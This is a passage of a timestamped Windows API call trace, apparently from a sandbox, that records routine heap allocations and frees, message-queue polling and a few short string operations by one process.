Size=0x10) returned 0x29ee188 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee110 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72308 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723e8 [0083.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723e8 | out: hHeap=0x2af0000) returned 1 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee0e0 [0083.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72308 | out: hHeap=0x2af0000) returned 1 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ee050 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e310 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee020 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72308 [0083.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee020 | out: hHeap=0x2af0000) returned 1 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e4c8 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee020 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee080 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0083.941] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee0c8 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72518 [0083.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee0c8 | out: hHeap=0x2af0000) returned 1 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e298 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee0c8 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee3e0 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72538 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e3d8 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72428 [0083.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e518 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee350 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee1e8 [0083.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e298 | out: hHeap=0x2af0000) returned 1 [0083.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72518 | out: hHeap=0x2af0000) returned 1 [0083.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee0c8 | out: hHeap=0x2af0000) returned 1 [0083.942] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e220 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee0c8 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72598 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee488 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72588 [0083.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72588 | out: hHeap=0x2af0000) returned 1 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72418 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee4b8 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee200 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72408 [0083.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee2d8 [0083.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72408 | out: hHeap=0x2af0000) returned 1 [0083.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee2d8 | out: hHeap=0x2af0000) returned 1 [0083.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee200 | out: hHeap=0x2af0000) returned 1 [0083.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee4b8 | out: hHeap=0x2af0000) returned 1 [0083.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72418 | out: hHeap=0x2af0000) returned 1 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723c8 [0083.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723c8 | out: hHeap=0x2af0000) returned 1 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0083.943] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723f8 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee200 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee4b8 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724a8 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee2d8 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee308 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72498 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee320 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72588 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee3f8 [0083.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72588 | out: hHeap=0x2af0000) returned 1 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee770 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72588 [0083.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72588 | out: hHeap=0x2af0000) returned 1 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee7b8 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723b8 [0083.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723b8 | out: hHeap=0x2af0000) returned 1 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5a8 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72418 [0083.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0083.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee3f8 | out: hHeap=0x2af0000) returned 1 [0083.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0083.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee770 | out: hHeap=0x2af0000) returned 1 [0083.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee7b8 | out: hHeap=0x2af0000) returned 1 [0083.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee320 | out: hHeap=0x2af0000) returned 1 [0083.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72498 | out: hHeap=0x2af0000) returned 1 [0083.943] lstrlenW (lpString="20") returned 2 [0083.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5a8 | out: hHeap=0x2af0000) returned 1 [0083.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72418 | out: hHeap=0x2af0000) returned 1 [0083.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0083.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee308 | out: hHeap=0x2af0000) returned 1 [0083.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee2d8 | out: hHeap=0x2af0000) returned 1 [0083.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724a8 | out: hHeap=0x2af0000) returned 1 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee3f8 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee308 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724d8 [0083.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee4b8 | out: hHeap=0x2af0000) returned 1 [0083.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee200 | out: hHeap=0x2af0000) returned 1 [0083.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723f8 | out: hHeap=0x2af0000) returned 1 [0083.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee308 | out: hHeap=0x2af0000) returned 1 [0083.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724d8 | out: hHeap=0x2af0000) returned 1 [0083.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee3f8 | out: hHeap=0x2af0000) returned 1 [0083.944] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.944] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72518 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee2d8 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee4b8 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72408 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee308 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723a8 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee200 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee3f8 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723b8 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee320 [0083.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723b8 | out: hHeap=0x2af0000) returned 1 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee7b8 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72498 [0083.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72498 | out: hHeap=0x2af0000) returned 1 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee620 [0083.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72588 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72588 | out: hHeap=0x2af0000) returned 1 [0083.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5a8 [0083.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a723b8 [0083.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5d8 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee320 | out: hHeap=0x2af0000) returned 1 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee3f8 | out: hHeap=0x2af0000) returned 1 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee7b8 | out: hHeap=0x2af0000) returned 1 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee620 | out: hHeap=0x2af0000) returned 1 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee200 | out: hHeap=0x2af0000) returned 1 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723a8 | out: hHeap=0x2af0000) returned 1 [0083.945] lstrlenW (lpString="30") returned 2 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5a8 | out: hHeap=0x2af0000) returned 1 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723b8 | out: hHeap=0x2af0000) returned 1 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5d8 | out: hHeap=0x2af0000) returned 1 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee308 | out: hHeap=0x2af0000) returned 1 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72408 | out: hHeap=0x2af0000) returned 1 [0083.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee3f8 [0083.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee200 [0083.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72408 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee4b8 | out: hHeap=0x2af0000) returned 1 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee2d8 | out: hHeap=0x2af0000) returned 1 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72518 | out: hHeap=0x2af0000) returned 1 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee200 | out: hHeap=0x2af0000) returned 1 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72408 | out: hHeap=0x2af0000) returned 1 [0083.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee3f8 | out: hHeap=0x2af0000) returned 1 [0083.945] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.945] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72588 [0083.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0083.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee2d8 [0083.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72478 [0083.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee308 [0083.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee3f8 [0083.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723d8 [0083.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee4b8 [0083.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee200 [0083.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724b8 [0083.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee320 [0083.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724b8 | out: hHeap=0x2af0000) returned 1 [0083.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5a8 [0083.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724b8 [0083.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724b8 | out: hHeap=0x2af0000) returned 1 [0083.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee7b8 [0083.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724d8 [0083.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724d8 | out: hHeap=0x2af0000) returned 1 [0083.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5d8 [0083.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a723f8 [0083.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5f0 [0083.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee320 | out: hHeap=0x2af0000) returned 1 [0083.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee200 | out: hHeap=0x2af0000) returned 1 [0083.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5a8 | out: hHeap=0x2af0000) returned 1 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee7b8 | out: hHeap=0x2af0000) returned 1 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee4b8 | out: hHeap=0x2af0000) returned 1 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723d8 | out: hHeap=0x2af0000) returned 1 [0083.961] lstrlenW (lpString="20") returned 2 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5d8 | out: hHeap=0x2af0000) returned 1 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723f8 | out: hHeap=0x2af0000) returned 1 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5f0 | out: hHeap=0x2af0000) returned 1 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee3f8 | out: hHeap=0x2af0000) returned 1 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee308 | out: hHeap=0x2af0000) returned 1 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72478 | out: hHeap=0x2af0000) returned 1 [0083.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee3f8 [0083.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee308 [0083.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a723a8 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee2d8 | out: hHeap=0x2af0000) returned 1 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72588 | out: hHeap=0x2af0000) returned 1 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee308 | out: hHeap=0x2af0000) returned 1 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723a8 | out: hHeap=0x2af0000) returned 1 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee3f8 | out: hHeap=0x2af0000) returned 1 [0083.961] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0083.961] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72588 [0083.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee308 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72588 | out: hHeap=0x2af0000) returned 1 [0083.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee308 | out: hHeap=0x2af0000) returned 1 [0083.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee2d8 [0083.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee080 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee020 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e4c8 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72308 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e310 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee488 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee0c8 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72598 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e220 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee1e8 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee350 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e518 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72428 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e3d8 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee050 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722e8 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee008 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee0e0 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee110 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee188 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721c8 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edff0 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0083.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edf48 | out: hHeap=0x2af0000) returned 1 [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee2d8 | out: hHeap=0x2af0000) returned 1 [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee2d8 | out: hHeap=0x2af0000) returned 1 [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee350 | out: hHeap=0x2af0000) returned 1 [0083.963] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e220 | out: hHeap=0x2af0000) returned 1 [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72308 | out: hHeap=0x2af0000) returned 1 [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72498 | out: hHeap=0x2af0000) returned 1 [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72418 | out: hHeap=0x2af0000) returned 1 [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee1e8 | out: hHeap=0x2af0000) returned 1 [0083.963] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5a8 | out: hHeap=0x2af0000) returned 1 [0083.963] 